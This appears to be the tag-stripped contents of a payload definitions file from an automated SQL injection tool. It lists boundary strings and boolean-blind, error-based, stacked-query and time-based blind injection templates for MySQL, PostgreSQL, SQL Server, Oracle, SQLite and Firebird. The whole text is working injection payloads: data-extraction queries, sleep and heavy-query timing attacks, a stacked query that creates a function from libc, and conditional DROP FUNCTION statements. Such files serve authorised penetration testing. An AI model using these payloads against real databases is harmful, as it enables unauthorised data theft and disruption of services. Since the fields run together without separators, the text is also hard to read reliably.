311,21)411,22')311,22'511,24"111,21)AND ([RANDNUM]=[RANDNUM]211,21))AND (([RANDNUM]=[RANDNUM]311,21)))AND ((([RANDNUM]=[RANDNUM]101,2,31111,22')AND ('[RANDSTR]'='[RANDSTR]211,22'))AND (('[RANDSTR]'='[RANDSTR]311,22')))AND ((('[RANDSTR]'='[RANDSTR]111,22'AND '[RANDSTR]'='[RANDSTR]211,23')AND ('[RANDSTR]' LIKE '[RANDSTR]311,23'))AND (('[RANDSTR]' LIKE '[RANDSTR]311,23')))AND ((('[RANDSTR]' LIKE '[RANDSTR]211,23'AND '[RANDSTR]' LIKE '[RANDSTR]311,24")AND ("[RANDSTR]"="[RANDSTR]411,24"))AND (("[RANDSTR]"="[RANDSTR]411,24")))AND ((("[RANDSTR]"="[RANDSTR]211,24"AND "[RANDSTR]"="[RANDSTR]411,25")AND ("[RANDSTR]" LIKE "[RANDSTR]511,25"))AND (("[RANDSTR]" LIKE "[RANDSTR]511,25")))AND ((("[RANDSTR]" LIKE "[RANDSTR]311,25"AND "[RANDSTR]" LIKE "[RANDSTR]AND boolean-based blind - WHERE or HAVING clause11111AND [INFERENCE]AND [RANDNUM]=[RANDNUM]AND [RANDNUM]=[RANDNUM1]AND boolean-based blind - WHERE or HAVING clause (MySQL comment)14111AND [INFERENCE]AND [RANDNUM]=[RANDNUM]#AND [RANDNUM]=[RANDNUM1]AND boolean-based blind - WHERE or HAVING clause (Generic comment)14111AND [INFERENCE]AND [RANDNUM]=[RANDNUM]--AND [RANDNUM]=[RANDNUM1]OR boolean-based blind - WHERE or HAVING clause12312OR NOT [INFERENCE]OR NOT [RANDNUM]=[RANDNUM]OR NOT [RANDNUM]=[RANDNUM1]OR boolean-based blind - WHERE or HAVING clause (MySQL comment)13312OR NOT [INFERENCE]OR NOT [RANDNUM]=[RANDNUM]#OR NOT [RANDNUM]=[RANDNUM1]MySQLOR boolean-based blind - WHERE or HAVING clause (Generic comment)13312OR NOT [INFERENCE]OR NOT [RANDNUM]=[RANDNUM]--OR NOT [RANDNUM]=[RANDNUM1]Generic boolean-based blind - Parameter replace1211,2,33(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/0 END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END))Generic boolean-based blind - Parameter replace (original value)1311,2,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))MySQL >= 5.0 boolean-based blind - Parameter replace1311,2,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))MySQL>= 5.0MySQL < 5.0 boolean-based blind - Parameter replace1411,2,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))MySQLMicrosoft SQL Server/Sybase boolean-based blind - Parameter replace1311,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))Microsoft SQL ServerWindowsOracle boolean-based blind - Parameter replace1311,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)OracleGeneric boolean-based blind - GROUP BY and ORDER BY clauses1312,31, (SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/0 END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END))Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)1412,31, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses1312,31, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))MySQL>= 5.0MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses1412,31, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))MySQLMicrosoft SQL Server/Sybase boolean-based blind - ORDER BY clause13131, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))Microsoft SQL ServerWindowsOracle boolean-based blind - GROUP BY and ORDER BY clauses1312,31, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)OracleMySQL >= 5.0 AND error-based - WHERE or HAVING clause21011AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.0PostgreSQL AND error-based - WHERE or HAVING clause21011AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]PostgreSQLMicrosoft SQL Server/Sybase AND error-based - WHERE or HAVING clause21011AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerWindowsMicrosoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)22011AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerWindowsOracle AND error-based - WHERE or HAVING clause (XMLType)21011AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleOracle AND error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)22011AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Oracle>= 8.1.6Oracle AND error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)23011AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM], '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleFirebird AND error-based - WHERE or HAVING clause22011AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]FirebirdMySQL >= 5.0 OR error-based - WHERE or HAVING clause22212OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.0MySQL OR error-based - WHERE or HAVING clause22012OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)#[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQLPostgreSQL OR error-based - WHERE or HAVING clause22212OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]PostgreSQLMicrosoft SQL Server/Sybase OR error-based - WHERE or HAVING clause22212OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerWindowsMicrosoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)23212OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerWindowsOracle OR error-based - WHERE or HAVING clause (XMLType)22212OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleOracle OR error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)23212OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Oracle>= 8.1.6Oracle OR error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)24212OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM], '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleFirebird OR error-based - WHERE or HAVING clause23212OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]FirebirdMySQL >= 5.0 error-based - Parameter replace2301,2,33(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.0PostgreSQL error-based - Parameter replace2301,2,33(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]PostgreSQLMicrosoft SQL Server/Sybase error-based - Parameter replace2301,33(CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerWindowsOracle error-based - Parameter replace2301,33(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleFirebird error-based - Parameter replace2401,33(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]FirebirdMySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses2302,31, (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a), (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.0PostgreSQL error-based - GROUP BY and ORDER BY clauses2302,31, (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)), (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]PostgreSQLMicrosoft SQL Server/Sybase error-based - ORDER BY clause23031, (CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))), (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerWindowsOracle error-based - GROUP BY and ORDER BY clauses2302,31, (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL), (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleMySQL > 5.0.11 stacked queries41001; IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM]);; SELECT SLEEP([SLEEPTIME]);#MySQL> 5.0.11MySQL < 5.0.12 stacked queries (heavy query)42201; IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]);; SELECT BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'));#MySQLPostgreSQL > 8.1 stacked queries41001; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);; SELECT PG_SLEEP([SLEEPTIME]);--PostgreSQL> 8.1PostgreSQL stacked queries (heavy query)42201; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END);; SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000);--PostgreSQLPostgreSQL < 8.2 stacked queries (Glibc)44001; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]);--PostgreSQL< 8.2LinuxMicrosoft SQL Server/Sybase stacked queries41001; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]';; WAITFOR DELAY '0:0:[SLEEPTIME]';--Microsoft SQL ServerWindowsOracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)45001; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL;; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME]) FROM DUAL;--OracleOracle stacked queries (heavy query)45201; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL;; SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5;--OracleOracle stacked queries (DBMS_LOCK.SLEEP)45001; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END;--OracleOracle stacked queries (USER_LOCK.SLEEP)45001; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END;; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END;--OracleSQLite > 2.0 stacked queries (heavy query)43201; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END);; SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))));--SQLite> 2.0Firebird stacked queries (heavy query)43201; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE;; SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3;--Firebird>= 2.0MySQL stacked conditional-error blind queries13001; IF(([INFERENCE]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]);; IF(([RANDNUM]=[RANDNUM]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]);#; IF(([RANDNUM]=[RANDNUM1]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]);MySQLPostgreSQL stacked conditional-error blind queries13002; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END);; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END);--; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END);Microsoft SQL Server/Sybase stacked conditional-error blind queries13001; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];--; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];Microsoft SQL ServerWindowsMySQL > 5.0.11 AND time-based blind5111,2,31AND [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])AND SLEEP([SLEEPTIME])MySQL> 5.0.11MySQL > 5.0.11 AND time-based blind (comment)5411,2,31AND [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])AND SLEEP([SLEEPTIME])#MySQL> 5.0.11MySQL < 5.0.12 AND time-based blind (heavy query)5221,2,31AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))MySQLMySQL < 5.0.12 AND time-based blind (heavy query - comment)5521,2,31AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))#MySQLPostgreSQL > 8.1 AND time-based blind5111,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))PostgreSQL> 8.1PostgreSQL > 8.1 AND time-based blind (comment)5511,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))--PostgreSQL> 8.1PostgreSQL AND time-based blind (heavy query)5321,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))PostgreSQLPostgreSQL AND time-based blind (heavy query - comment)5521,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))--PostgreSQLMicrosoft SQL Server/Sybase time-based blind51001IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'WAITFOR DELAY '0:0:[SLEEPTIME]'--Microsoft SQL ServerWindowsMicrosoft SQL Server/Sybase AND time-based blind (heavy query)5221,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)Microsoft SQL ServerWindowsMicrosoft SQL Server/Sybase AND time-based blind (heavy query - comment)5521,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)--Microsoft SQL ServerWindowsOracle AND time-based blind5111,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME])OracleOracle AND time-based blind (comment)5511,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)AND 